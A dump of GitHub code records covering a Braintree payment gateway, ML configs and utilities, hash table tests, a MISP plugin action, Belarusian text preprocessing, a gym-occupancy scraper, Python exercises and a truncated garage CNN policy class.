+{"seq_id":"31693751396","text":"from django.conf import settings\nfrom app.gateway import Gateway, TransactionProblem\nfrom app.models import MerchantTransaction\nimport braintree\n\n\nclass BraintreePaymentsGateway(Gateway):\n\n def __init__(self):\n if self.test_mode:\n env = braintree.Environment.Sandbox\n else:\n env = braintree.Environment.Production\n merchant_settings = getattr(settings, \"MERCHANT_SETTINGS\")\n if not merchant_settings or \\\n not merchant_settings.get(\"braintree_payments\"):\n\n raise GatewayNotConfigured(\"The '%s' gateway is not correctly \"\n \"configured.\" % self.display_name)\n braintree_settings = merchant_settings['braintree_payments']\n braintree.Configuration.configure(\n env,\n braintree_settings['MERCHANT_ACCOUNT_ID'],\n braintree_settings['PUBLIC_KEY'],\n braintree_settings['PRIVATE_KEY']\n )\n\n def find_transaction(self, transaction_id):\n \"\"\"\n Find a transaction, given a transaction_id. This does not return\n a result object. This will raise a :class:`NotFoundError ` if the provided\n credit_card_id is not found. ::\n \"\"\"\n return braintree.Transaction.find(transaction_id)\n\n def create_transaction(self, user, cardholder_name, amount, number,\n month, year, cvv):\n \"\"\"\n Create a purchase with the provided Credit Card and stores the \n Transaction result in the table Transaction\n \"\"\"\n result = braintree.Transaction.sale({\n \"amount\": amount,\n \"credit_card\": {\n \"cardholder_name\": cardholder_name,\n \"number\": number,\n \"expiration_month\": month,\n \"expiration_year\": year,\n \"cvv\": cvv,\n }\n })\n if result.is_success:\n transaction = MerchantTransaction.objects.create(\n merchant_id=result.transaction.id,\n user=user,\n amount=amount,\n gateway='braintree',\n status='success',\n response=result.transaction\n )\n elif result.transaction:\n transaction = MerchantTransaction.objects.create(\n merchant_id=result.transaction.id,\n user=user,\n amount=amount,\n gateway='braintree',\n status='failure',\n message=result.message,\n response=result.transaction\n )\n else:\n print(\"message: \" + result.message)\n for error in result.errors.deep_errors:\n print(\"attribute: \" + error.attribute)\n print(\" code: \" + error.code)\n print(\" message: \" + error.message)\n raise TransactionProblem(\"We had a problem with your transaction\")\n return transaction\n","repo_name":"marton987/django-gateway","sub_path":"django_gateway/app/gateways/braintree_payments_gateway.py","file_name":"braintree_payments_gateway.py","file_ext":"py","file_size_in_byte":3009,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5009696609","text":"resize_dims = (1400, 788)\n\nnormalize_image = {\n \"type\": \"Normalize\",\n \"mean\": [96.56215221, 98.2655526, 94.69506836],\n \"std\": [31.36219647, 34.50400645, 33.31346927],\n \"to_rgb\": True,\n}\n\nresize_image = {\"type\": \"Resize\", \"img_scale\": resize_dims, \"keep_ratio\": False}\n\npad_image = {\"type\": \"Pad\", \"size_divisor\": 32}\n\ntrain_pipeline = [\n {\"type\": \"LoadImageFromFile\"},\n {\"type\": \"LoadAnnotations\", \"with_bbox\": True},\n {\"type\": \"RandomFlip\", \"flip_ratio\": 0.5},\n resize_image,\n normalize_image,\n pad_image,\n {\"type\": \"DefaultFormatBundle\"},\n {\"type\": \"Collect\", \"keys\": [\"img\", \"gt_bboxes\", \"gt_labels\"]},\n]\n\ntest_pipeline = [\n {\"type\": \"LoadImageFromFile\"},\n {\n \"type\": \"MultiScaleFlipAug\",\n \"img_scale\": resize_dims,\n \"flip\": False,\n \"transforms\": [\n 
resize_image,\n {\"type\": \"RandomFlip\"},\n normalize_image,\n pad_image,\n {\"type\": \"ImageToTensor\", \"keys\": [\"img\"]},\n {\"type\": \"Collect\", \"keys\": [\"img\"]},\n ],\n },\n]\n\ndata = {\n \"samples_per_gpu\": 2,\n \"workers_per_gpu\": 2,\n \"train\": {\n \"type\": \"VisDroneDataset\",\n \"ann_file\": None,\n \"img_prefix\": \"VisDrone2019-DET-train/images\",\n \"pipeline\": train_pipeline,\n },\n \"val\": {\n \"type\": \"VisDroneDataset\",\n \"ann_file\": None,\n \"img_prefix\": \"VisDrone2019-DET-val/images\",\n \"pipeline\": test_pipeline,\n },\n \"test\": {\n \"type\": \"VisDroneDataset\",\n \"ann_file\": None,\n \"img_prefix\": \"VisDrone2019-DET-val/images\",\n \"pipeline\": test_pipeline,\n },\n}\nworkflow = [(\"train\", 1)]\n","repo_name":"andersonvc/mmdet-visdrone","sub_path":"configs/_base_/datasets/visdrone_dataset.py","file_name":"visdrone_dataset.py","file_ext":"py","file_size_in_byte":1665,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"73"} +{"seq_id":"10234174099","text":"import csv\nimport json\nimport torch\nimport h5py\nfrom collections import OrderedDict\n\ndef to_tensor(rv: dict):\n \"\"\"\n Convert scalar-type parameters to a torch.Tensor.\n rv: dictionary (param name) -> (param value)\n \"\"\"\n for name, param in rv.items():\n if isinstance(param, dict):\n rv[name] = to_tensor(param)\n\n if isinstance(param, int) or isinstance(param, float) or isinstance(param, list):\n rv[name] = torch.tensor(param)\n return rv\n\nclass StoreGraph:\n def __init__(self, V: int, K:int, edges: dict, product: dict, outside_state: str=\"OUTSIDE\", init_state: str=\"INIT\", checkout_state: str=\"CHECKOUT\") -> None:\n self.V = V\n self.K = K\n nodes = edges.keys()\n self.node2idx = OrderedDict({node: i for i, node in enumerate(nodes)})\n self.adj = torch.zeros(self.V, self.V).long()\n self.product_mat = torch.zeros(self.V, self.K)\n for vi in nodes:\n vi_idx = self.node2idx[vi]\n for vj in edges[vi]:\n vj_idx = self.node2idx[vj]\n self.adj[vi_idx, vj_idx] = 1\n for pj in product[vi]:\n # pj_idx = self.product2idx[pj]\n pj_idx = pj\n self.product_mat[vi_idx, pj_idx] = 1\n\n self.outside_state = outside_state\n self.init_state = init_state\n self.checkout_state = checkout_state\n\n @property\n def outside(self):\n return self.node2idx[self.outside_state]\n \n @property\n def init(self):\n return self.node2idx[self.init_state]\n\n @property\n def checkout(self):\n return self.node2idx[self.checkout_state]\n \ndef create_graph_and_product(cfg_path, V, K):\n edges, product = {}, {}\n with open(cfg_path, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='\"')\n for row in reader:\n edges[row[0]] = row[1].split('-')\n p = row[2].split('-')\n if p[0] == '': \n product[row[0]] = []\n else: \n product[row[0]] = list(map(int, p))\n g = StoreGraph(V, K, edges, product)\n return g\n\n\ndef save_h5py(save_path, config, config_bytes, train_data, val_data):\n # save dataset\n h5f = h5py.File(save_path, 'w')\n\n group_config = h5f.create_group('config')\n group_config.create_dataset('config_file', data=config_bytes)\n\n group_data = h5f.create_group('train_data')\n group_data.create_dataset('a_ikt', (config['T_max'], config['N'], config['K']), data=train_data['a_ikt'], dtype=float)\n group_data.create_dataset('x_it', (config['T_max'], config['N']), data=train_data['x_it'], dtype=int)\n group_data.create_dataset('rho_jt', (config['T_max'], config['V']), data=train_data['rho_jt'], dtype=float)\n 
group_data.create_dataset('T_0', (config['N'],), data=train_data['T_0'], dtype=int)\n group_data.create_dataset('H_it', (config['T_max'], config['N']), data=train_data['H_it'], dtype=int)\n group_data.create_dataset('S_it', (config['T_max'], config['N']), data=train_data['S_it'], dtype=int)\n group_data.create_dataset('B_ikt', (config['T_max'], config['N'], config['K']), data=train_data['B_ikt'], dtype=int)\n\n group_data = h5f.create_group('val_data')\n group_data.create_dataset('a_ikt', (config['T_max'], config['N'], config['K']), data=val_data['a_ikt'], dtype=float)\n group_data.create_dataset('x_it', (config['T_max'], config['N']), data=val_data['x_it'], dtype=int)\n group_data.create_dataset('rho_jt', (config['T_max'], config['V']), data=val_data['rho_jt'], dtype=float)\n group_data.create_dataset('T_0', (config['N'],), data=val_data['T_0'], dtype=int)\n group_data.create_dataset('H_it', (config['T_max'], config['N']), data=val_data['H_it'], dtype=int)\n group_data.create_dataset('S_it', (config['T_max'], config['N']), data=val_data['S_it'], dtype=int)\n group_data.create_dataset('B_ikt', (config['T_max'], config['N'], config['K']), data=val_data['B_ikt'], dtype=int)\n\n h5f.close()\n\ndef load_h5py(load_path):\n h5f = h5py.File(load_path, 'r')\n\n # Read the binary data from the dataset and convert it to a JSON object\n cfg = h5f['config']\n config = json.loads(cfg['config_file'][()])\n # Read the tensor data\n # dataset = h5f['dataset']['a_ikt']\n dataset_names = [\"x_it\", \"a_ikt\", \"rho_jt\", \"T_0\", \"H_it\", \"S_it\", \"B_ikt\"]\n train_data = { name: torch.tensor(h5f['train_data'][name][:]) for name in dataset_names }\n val_data = { name: torch.tensor(h5f['val_data'][name][:]) for name in dataset_names }\n # Close the file\n h5f.close()\n\n return dict(config=config, train_data=train_data, val_data=val_data)","repo_name":"take-koshizuka/Shopping-path-analysis","sub_path":"util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":4674,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"23936606545","text":"import pytest\nfrom hash_table.hash_table import Hashtable\nfrom hash_table.repeated_word import repeated_word\n\n\ndef test_set_and_get():\n ht = Hashtable()\n ht.set(\"key1\", \"value1\")\n assert ht.get(\"key1\") == \"value1\"\n\n\ndef test_set_replaces_existing_key():\n ht = Hashtable()\n ht.set(\"key1\", \"value1\")\n ht.set(\"key1\", \"value2\")\n assert ht.get(\"key1\") == \"value2\"\n\n\ndef test_get_nonexistent_key():\n ht = Hashtable()\n assert ht.get(\"key1\") is None\n\n\ndef test_has_existing_key():\n ht = Hashtable()\n ht.set(\"key1\", \"value1\")\n assert ht.has(\"key1\") is True\n\n\ndef test_has_nonexistent_key():\n ht = Hashtable()\n assert ht.has(\"key1\") is False\n\n\ndef test_keys():\n ht = Hashtable()\n ht.set(\"key1\", \"value1\")\n ht.set(\"key2\", \"value2\")\n ht.set(\"key3\", \"value3\")\n keys = ht.keys()\n assert \"key1\" in keys\n assert \"key2\" in keys\n assert \"key3\" in keys\n assert len(keys) == 3\n\n\ndef test_collision_handling():\n ht = Hashtable(size=1) # Force collision with a small size\n ht.set(\"key1\", \"value1\")\n ht.set(\"key2\", \"value2\")\n assert ht.get(\"key1\") == \"value1\"\n assert ht.get(\"key2\") == \"value2\"\n\n\ndef test_retrieve_collision_value():\n ht = Hashtable(size=1) # Force collision with a small size\n ht.set(\"key1\", \"value1\")\n ht.set(\"key2\", \"value2\")\n assert ht.get(\"key1\") == \"value1\"\n assert ht.get(\"key2\") == 
\"value2\"\n\n\ndef test_hash():\n ht = Hashtable()\n assert ht.hash(\"key1\") >= 0\n assert ht.hash(\"key1\") < ht.size\n\ndef test_repeated_word():\n assert repeated_word(\"Once upon a time, there was a brave princess who...\") == \"a\"\n assert repeated_word(\"It was the best of times, it was the worst of times, it was the age of wisdom, it was the age of foolishness...\") == \"it\"\n assert repeated_word(\"It was a queer, sultry summer, the summer they electrocuted me, and I didn’t realize I was dead yet...\") == \"summer\"\n\ndef test_repeated_word_no_repeats():\n assert repeated_word(\"\") is None\n assert repeated_word(\"Saif Obeidat\") is None\n assert repeated_word(\"Saif Obeidat Saif Obeidat\") == \"saif\"\n\n\n# Run the tests\npytest.main([\"-v\"])","repo_name":"saifobe/data-structures-and-algorithms","sub_path":"hash_table/tests/test_hash.py","file_name":"test_hash.py","file_ext":"py","file_size_in_byte":2135,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"3834083217","text":"import insightconnect_plugin_runtime\nfrom .schema import PublishInput, PublishOutput\n\n# Custom imports below\n\n\nclass Publish(insightconnect_plugin_runtime.Action):\n def __init__(self):\n super(self.__class__, self).__init__(\n name=\"publish\",\n description=\"Publish an event\",\n input=PublishInput(),\n output=PublishOutput(),\n )\n\n def run(self, params={}):\n event = params.get(\"event\")\n\n client = self.connection.client\n in_event = client.get_event(event)\n published = client.publish(in_event, True)\n try:\n published[\"id\"]\n except KeyError:\n self.logger.error(\"Something went wrong see returned request, %s\", published)\n raise\n return {\"published\": published}\n","repo_name":"rapid7/insightconnect-plugins","sub_path":"plugins/misp/komand_misp/actions/publish/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":802,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"73"} +{"seq_id":"15546746718","text":"import re\nimport os\nimport string\nfrom gensim import utils\nfrom gensim.parsing.preprocessing import strip_punctuation, strip_short, strip_numeric, strip_multiple_whitespaces, remove_stopwords\nimport urllib.request\nimport zipfile\nimport lzma\nimport shutil\nimport xml.dom.minidom\nimport json\nfrom itertools import islice\n\nimport logging\nlogging.basicConfig(level=logging.INFO, force = True)\nlogger = logging.getLogger()\nlogger.info(\"Logging initialized\")\n\n\ndef exists_nonempty_file(filename):\n return os.path.exists(filename) and os.path.getsize(filename) > 0\n\n\ndef corpus_downloaded():\n return exists_nonempty_file('be.txt')\n\n\ndef download_corpus():\n # Original file found here: https://metatext.io/datasets/cc100-belarusian\n urllib.request.urlretrieve('https://belarus-embedding.s3.eu-central-1.amazonaws.com/be.txt.xz',\n 'be.txt.xz')\n with lzma.open(\"be.txt.xz\", \"rb\") as fsrc:\n with open(\"be.txt\", \"wb\") as fdst:\n shutil.copyfileobj(fsrc, fdst)\n\n\ndef grammar_downloaded():\n return exists_nonempty_file('GrammarDB-master/N3.xml')\n\n\ndef download_grammar():\n urllib.request.urlretrieve('https://github.com/Belarus/GrammarDB/archive/refs/heads/master.zip',\n 'GrammarDB.zip')\n with zipfile.ZipFile('GrammarDB.zip', 'r') as zip_ref:\n zip_ref.extractall('.')\n\n\nBASE_FORM_BLACKLIST = [\n 'як', # can mean 'bull', but mostly used as particle\n 'і' # for some reason listed as noun\n] + [chr(ord('а')+delta) for delta in range(0, 32)] # 
alphabet letters\n\nDERIVED_FORM_BLACKLIST = [\n 'але', # can mean geographic place 'Ала', but mostly used as particle 'але'\n 'калі', # weird form of 'калій' - 'каль', but used as particle 'калі'\n 'вось', # can mean 'axis', but mostly used as particle\n 'нам', # can mean short form of 'намеснік', but mostly used as pronoun 'мы'\n 'наша', # some weird noun 'наша', but mostly used as pronoun 'мы'\n 'нашы', # can be used as noun, but motly used as pronoun 'мы'\n 'яму' # can be used as rare noun 'ям', but mostly used as pronoun 'ён'\n]\n\n\ndef calculate_mapping_from_forms_to_base(filepath, tag_prefixes=[]):\n xml_doc = xml.dom.minidom.parse(filepath)\n paradigms = xml_doc.getElementsByTagName('Paradigm')\n result = {}\n collision_count = 0\n collisions = set()\n for paradigm in paradigms:\n tag = paradigm.getAttribute('tag')\n if len(tag_prefixes) == 0 or any([tag.startswith(p) for p in tag_prefixes]):\n variants = paradigm.getElementsByTagName('Variant')\n for variant in variants:\n base = variant.getAttribute('lemma').replace(\"+\", \"\").lower()\n if base not in BASE_FORM_BLACKLIST:\n forms = variant.getElementsByTagName('Form')\n local_map = {}\n citation_count = max([form.getAttribute('slouniki').count(',') for form in forms]) + 1\n for form in forms:\n if len(form.childNodes) > 0:\n word = form.childNodes[0].data.replace(\"+\", \"\").lower()\n local_map[word] = (base, citation_count)\n for k, v in local_map.items():\n if k in result:\n if result[k][1] == v[1] and result[k][0] != v[0]:\n collision_count += 1\n collisions.add(v[0])\n collisions.add(result[k][0])\n elif result[k][1] < v[1]:\n result[k] = v\n else:\n result[k] = v\n logger.info(\n f\"Collisions (forms leading to different base word, and having same amount of citation): {collision_count}\")\n logger.info(f\"Examples of collisions: {list(islice(collisions, 5))}\")\n for k in result:\n result[k] = result[k][0]\n return result\n\n\ndef generate_word_mapping(filename, verbs=True, adjectives=True):\n word_map = {}\n if verbs:\n v = calculate_mapping_from_forms_to_base('GrammarDB-master/V.xml')\n word_map.update(v)\n\n nprop = calculate_mapping_from_forms_to_base('GrammarDB-master/NP.xml', ['NPII'])\n word_map.update(nprop)\n\n n1 = calculate_mapping_from_forms_to_base('GrammarDB-master/N1.xml')\n n2 = calculate_mapping_from_forms_to_base('GrammarDB-master/N2.xml')\n n3 = calculate_mapping_from_forms_to_base('GrammarDB-master/N3.xml')\n word_map.update(n1)\n word_map.update(n2)\n word_map.update(n3)\n\n if adjectives:\n adj1 = calculate_mapping_from_forms_to_base('GrammarDB-master/A1.xml', ['ARP', 'AQP'])\n adj2 = calculate_mapping_from_forms_to_base('GrammarDB-master/A2.xml', ['ARP', 'AQP'])\n word_map.update(adj1)\n word_map.update(adj2)\n\n manual_word_map = {\n 'расеі': word_map['расіі'],\n 'расея': 'расія',\n 'расею': word_map['расію'],\n 'расеяй': word_map['расіяй'],\n 'ссср': 'ссср',\n 'бсср': 'бсср',\n 'бнр': 'бнр',\n 'вкл': 'вкл',\n 'смі': 'смі',\n 'шоў': 'шоў',\n 'тыс': 'тысяча',\n 'млн': 'мільён',\n 'вул': 'вуліца',\n 'вобл': 'вобласць',\n 'тэл': 'тэлефон',\n 'км': word_map['кіламетр'],\n 'навінаў': word_map['навін'],\n 'тысячаў': word_map['тысяч'],\n 'прэзыдэнта': word_map['прэзідэнта'],\n 'прэзыдэнт': word_map['прэзідэнт'],\n 'камэнтары': word_map['каментары'],\n 'сыстэму': word_map['сістэму'],\n 'сытуацыі': word_map['сітуацыі'],\n 'сытуацыя': word_map['сітуацыя'],\n 'цэнтар': word_map['цэнтр'],\n 'вільня': word_map['вільнюс'],\n 'вільню': word_map['вільнюс'],\n 'сьмерці': word_map['смерці'],\n 'грамадзтва': 
word_map['грамадства'],\n 'эўропы': word_map['еўропы'],\n 'сябраў': word_map['сяброў'],\n 'апазыцыі': word_map['апазіцыі'],\n 'міністар': word_map[\"міністр\"],\n 'мэню': word_map[\"меню\"],\n 'інтэрвію': word_map[\"інтэрв'ю\"],\n 'газэты': word_map[\"газеты\"],\n 'дакумэнты': word_map[\"дакументы\"],\n 'сытуацыю': word_map[\"сітуацыю\"],\n 'разьдзел': word_map[\"раздзел\"],\n 'сьмерць': word_map[\"смерць\"],\n 'калёніі': word_map[\"калоніі\"],\n 'газэта': word_map[\"газета\"],\n }\n word_map.update(manual_word_map)\n\n if adjectives:\n manual_word_map = {\n 'спэцыяльныя': word_map[\"спецыяльныя\"],\n 'грамадзкі': word_map[\"грамадскі\"]\n }\n word_map.update(manual_word_map)\n\n with open(filename, 'w') as f:\n json.dump(word_map, f, ensure_ascii=False, indent=0, sort_keys=True)\n\n\ndef strip_trailing_newline(iterable):\n for i in iterable:\n yield i.rstrip()\n\n\n# this function is based on gensim.parser.preprocessing.strip_punctuation\n# we replace gensim's version to correctly handle symbol ' in words, such as п'еса or кар'ера\nRE_PUNCTUATION = re.compile(r'([%s])+' % re.escape(string.punctuation.replace(\"'\",\"\")), re.UNICODE)\ndef strip_punctuation(s):\n s = utils.to_unicode(s)\n return RE_PUNCTUATION.sub(\" \", s)\n\n\nCHARACTERS_MAP = {'’': '\\'', 'ý': 'ў', ' ў': ' у', 'i': 'і', 'ньн': 'нн', 'цьц': 'цц', 'сьц': 'сц', 'сьл':'сл', 'дзьдз': 'ддз', 'сьв': 'св', 'зьв': 'зв', 'сьп': 'сп', 'сьс': 'сс', 'сьн': 'сн', 'разьм': 'разм', 'зьмен': 'змен', 'зьмес': 'змес', 'зьмяс': 'змяс', 'зьмян': 'змян', 'зьн': 'зн', 'зьл': 'зл'}\ndef lower_and_replace_characters(iterable):\n for s in iterable:\n s = s.lower()\n for k, v in CHARACTERS_MAP.items():\n s = s.replace(k, v)\n yield s\n\n\ndef split_sentences(iterable):\n for i in iterable:\n merged_dots = re.sub(\"[\\.]+\", \".\", i)\n sentences = merged_dots.split('.')\n for s in sentences:\n yield s\n\n\ndef process_and_filter_word(raw_words, word_map):\n valid_words = []\n removed_words = []\n for w in raw_words:\n w = w.strip(\"'\")\n if w in word_map:\n valid_words.append(word_map[w])\n else:\n removed_words.append(w)\n return valid_words, removed_words\n\n\ndef preprocess_sentences(iterable, derived_form_blacklist, word_map, removed_words_accumulator: list):\n for i in iterable:\n s = strip_multiple_whitespaces(strip_numeric(strip_short(strip_punctuation(i))))\n s = re.sub(\"[«»“”„…—°′²]\", \"\", s)\n s = remove_stopwords(s, stopwords=derived_form_blacklist)\n valid_words, removed_words = process_and_filter_word(s.split(), word_map)\n s = ' '.join(valid_words)\n removed_words_accumulator.extend(removed_words)\n yield s\n\n\ndef remove_short_lines(iterable):\n for i in iterable:\n if not i.isspace() and len(i) >= 20:\n yield i\n\n\ndef process_corpus(word_map_filename, processed_filename, removed_words_filename, split_sent):\n with open(word_map_filename) as f:\n word_map = json.load(f)\n\n with open('be.txt', 'r') as original_file:\n with open(processed_filename, 'w') as sentences_file:\n with open(removed_words_filename, 'w') as removed_words_file:\n removed_words = []\n lines = strip_trailing_newline(original_file)\n lines = lower_and_replace_characters(lines)\n if split_sent:\n lines = split_sentences(lines)\n lines = preprocess_sentences(lines, DERIVED_FORM_BLACKLIST, word_map, removed_words)\n lines = remove_short_lines(lines)\n for s in lines:\n sentences_file.write(s + \"\\n\")\n removed_words_file.write(' '.join(removed_words) + \"\\n\")\n removed_words.clear()\n\n\ndef run_preprocessing(word_mapping_filename,\n 
processed_filename,\n removed_words_filename,\n verbs,\n adjectives,\n split_sent):\n\n if exists_nonempty_file(word_mapping_filename) and \\\n exists_nonempty_file(processed_filename) and \\\n exists_nonempty_file(removed_words_filename):\n logger.info(f'Corpus already preprocessed for mapping \"{word_mapping_filename}\", '\n f'processed corpus \"{processed_filename}\" and removed words \"{removed_words_filename}\"')\n return\n else:\n logger.info(f'Processing corpus for mapping \"{word_mapping_filename}\", '\n f'processed corpus \"{processed_filename}\" and removed words \"{removed_words_filename}\"')\n\n if not corpus_downloaded():\n download_corpus()\n\n if not grammar_downloaded():\n download_grammar()\n\n if not exists_nonempty_file(word_mapping_filename):\n generate_word_mapping(word_mapping_filename, verbs, adjectives)\n process_corpus(word_mapping_filename, processed_filename, removed_words_filename, split_sent)\n\n\nif __name__ == \"__main__\":\n run_preprocessing(word_mapping_filename='word-map.json',\n processed_filename='processed-corpus.txt',\n removed_words_filename='removed-words.txt',\n verbs=True,\n adjectives=True,\n split_sent=True)\n run_preprocessing(word_mapping_filename='word-map-only-nouns.json',\n processed_filename='processed-corpus-only-nouns.txt',\n removed_words_filename='removed-words-only-nouns.txt',\n verbs=False,\n adjectives=False,\n split_sent=True)\n run_preprocessing(word_mapping_filename='word-map.json',\n processed_filename='processed-corpus-no-sent-split.txt',\n removed_words_filename='removed-words-no-sent-split.txt',\n verbs=True,\n adjectives=True,\n split_sent=False)\n\n","repo_name":"pikazlou/belarusian-word-embedding","sub_path":"preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":12660,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"5535284787","text":"#!/usr/bin/python\n\n#I have this script checking that s&t spreadsheet every minute, and logging when/how it changes so we can test its true accuracy\n\nfrom datetime import datetime\nimport requests\n\nresponse = requests.get('https://docs.google.com/spreadsheets/d/1A0s8AJ8pLgPt929itg61E4SkB0HlZg8ofgiMyLZtbo8/edit?usp%5Cu003ddrive_web%5Cu0026amp;headers%5Cu003d1#gid=0&range=B11')\nassert response.status_code == 200, 'Wrong status code'\n\nraw = str(response.content)\nstart = raw.find(\"Fitness Center\") + 15\ncurrent = \"\"\n\nwhile raw[start].isdigit():\n current += raw[start]\n start += 1\n\nnow = datetime.now()\ncurrent_time = now.strftime(\"%D:%H:%M:%S\")\n\npath_to_log = \"/home/mitchhit234/git/JIMSS/Mitch/log.txt\"\n\nwith open(path_to_log, \"r\") as g:\n first_line = g.readline()\n for last_line in g:\n pass\n\ni = 0\nmatch = \"\"\nwhile last_line[i].isdigit():\n match += last_line[i]\n i += 1\n\nif match != current:\n f = open(path_to_log, \"a\")\n f.write(current + \", Time = \" + current_time + '\\n')\n f.close()\n","repo_name":"DavidShelbs/JIMSS","sub_path":"Mitch/scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":1020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"38868513937","text":"people = {\n\t'first_name': 'Han',\n\t'last_name': 'jinglong',\n\t'age': 18,\n\t'city': 'beijing',\n\n}\n\n# print(people['first_name'])\n\n# print(people['last_name'])\n\n# print(str( people['age']) )\n\n# print(people['city'])\n\nfor people_key, people_value in people.items():\n\tprint(\"people_key: \" + people_key)\n\tif 
isinstance(people_value, int):\n\t\tprint(\"people_value: \" +str(people_value))\n\telse:\n\t\tprint(\"people_value: \" + people_value)\n# print(type(people['age']))\n\npeople['jiji'] = 'big jiji'\n\nprint(people)\n\ndel people['jiji']\n\nprint(people) \n\n\nuser_o = {\n\t'username' :'efermi',\n\t'first' : 'enrico',\n\t'last' :'fermi',\n\n}\n\nfor k, v in user_o.items():\n\tprint(\"key \"+ k)\n\tprint(\"value \"+ v)\n\n\nrivers ={\n\t'nile':'egypt',\n\t'haunghe':'china',\n\t'long river':'china',\n\n}\n\nfor river, nation in rivers.items():\n\tprint(\"The \" + river.title() + \"runs through \"+ nation.title())\n\nfor river in rivers.keys():\n\tprint(river)\n\nfor nation in sorted(rivers.values()):\n\tprint(nation)\n","repo_name":"wenzhifeifeidetutu/pythonWork","sub_path":"pythonCrashcourseExerciseAnswer/p_87.py","file_name":"p_87.py","file_ext":"py","file_size_in_byte":954,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"40361759842","text":"# 【最长不含重复字符的子字符串】\n# 请从字符串中找出一个最长的不包含重复字符的子字符串,计算该最长子字符串的长度。\n# 输入: \"pwwkew\"\n# 输出: 3\n\ndef lengthOfLongestSubstring(s):\n if s == \"\":\n return 0\n sLength = len(s)\n # 对于每个位置都维持两个数据:\n # 第一,到目前位置为止最长的目标字符串的长度;\n # 第二,一个子字符串的长度,该子字符串从某一位到字符串末尾,且不含重复字符,最长\n dpResult = dict()\n # 遍历字符串的每一位\n for index in range(sLength):\n thisChar = s[index]\n if index == 0:\n maxLength = 1\n rearFirstIndex = 0\n else:\n lastMaxLength = dpResult[index-1][0]\n lastRearFirstIndex = dpResult[index-1][1]\n rearSubStr = s[lastRearFirstIndex:index]\n if thisChar in rearSubStr:\n rearFirstIndex = lastRearFirstIndex + rearSubStr.index(thisChar) + 1\n else:\n rearFirstIndex = lastRearFirstIndex\n maxLength = lastMaxLength if lastMaxLength >= (index-rearFirstIndex+1) else (index-rearFirstIndex+1)\n dpResult[index] = [maxLength, rearFirstIndex]\n return dpResult[sLength-1][0]\n\nprint(lengthOfLongestSubstring(\"pwwkew\"))","repo_name":"LobbyBoy-Dray/Leetcode-Problem-Set","sub_path":"code/2020-06-16-中等-最长不含重复字符地子字符串.py","file_name":"2020-06-16-中等-最长不含重复字符地子字符串.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"34035813341","text":"\"\"\"Discrete CNN Policy.\"\"\"\nimport torch\nfrom torch import nn\n\nfrom garage import InOutSpec\nfrom garage.torch.modules import DiscreteCNNModule\nfrom garage.torch.policies.stochastic_policy import StochasticPolicy\n\n\nclass DiscreteCNNPolicy(StochasticPolicy):\n \"\"\"DiscreteCNNPolicy.\n\n A policy that contains a CNN and a MLP to make prediction based on\n a discrete distribution.\n\n Args:\n env_spec (EnvSpec): Environment specification.\n image_format (str): Either 'NCHW' or 'NHWC'. Should match env_spec. Gym\n uses NHWC by default, but PyTorch uses NCHW by default.\n kernel_sizes (tuple[int]): Dimension of the conv filters.\n For example, (3, 5) means there are two convolutional layers.\n The filter for first layer is of dimension (3 x 3)\n and the second one is of dimension (5 x 5).\n strides (tuple[int]): The stride of the sliding window. For example,\n (1, 2) means there are two convolutional layers. The stride of the\n filter for first layer is 1 and that of the second layer is 2.\n hidden_channels (tuple[int]): Number of output channels for CNN.\n For example, (3, 32) means there are two convolutional layers.\n The filter for the first conv layer outputs 3 channels\n hidden_sizes (list[int]): Output dimension of dense layer(s) for\n the MLP for mean. 
For example, (32, 32) means the MLP consists\n of two hidden layers, each with 32 hidden units.\n mlp_hidden_nonlinearity (callable): Activation function for\n intermediate dense layer(s) in the MLP. It should return\n a torch.Tensor. Set it to None to maintain a linear activation.\n cnn_hidden_nonlinearity (callable): Activation function for\n intermediate CNN layer(s). It should return a torch.Tensor.\n Set it to None to maintain a linear activation.\n hidden_w_init (callable): Initializer function for the weight\n of intermediate dense layer(s). The function should return a\n torch.Tensor.\n hidden_b_init (callable): Initializer function for the bias\n of intermediate dense layer(s). The function should return a\n torch.Tensor.\n paddings (tuple[int]): Zero-padding added to both sides of the input\n padding_mode (str): The type of padding algorithm to use,\n either 'SAME' or 'VALID'.\n max_pool (bool): Bool for using max-pooling or not.\n pool_shape (tuple[int]): Dimension of the pooling layer(s). For\n example, (2, 2) means that all the pooling layers have\n shape (2, 2).\n pool_stride (tuple[int]): The strides of the pooling layer(s). For\n example, (2, 2) means that all the pooling layers have\n strides (2, 2).\n output_nonlinearity (callable): Activation function for output dense\n layer. It should return a torch.Tensor. Set it to None to\n maintain a linear activation.\n output_w_init (callable): Initializer function for the weight\n of output dense layer(s). The function should return a\n torch.Tensor.\n output_b_init (callable): Initializer function for the bias\n of output dense layer(s). The function should return a\n torch.Tensor.\n layer_normalization (bool): Bool for using layer normalization or not.\n name (str): Name of policy.\n\n \"\"\"\n\n def __init__(self,\n env_spec,\n image_format,\n kernel_sizes,\n hidden_channels,\n strides,\n hidden_sizes=(32, 32),\n cnn_hidden_nonlinearity=torch.nn.ReLU,\n mlp_hidden_nonlinearity=torch.nn.ReLU,\n hidden_w_init=nn.init.xavier_uniform_,\n hidden_b_init=nn.init.zeros_,\n paddings=0,\n padding_mode='zeros',\n max_pool=False,\n pool_shape=None,\n pool_stride=1,\n output_nonlinearity=None,\n output_w_init=nn.init.xavier_uniform_,\n output_b_init=nn.init.zeros_,\n layer_normalization=False,\n name='DiscreteCNNPolicy'):\n\n super().__init__(env_spec, name)\n\n 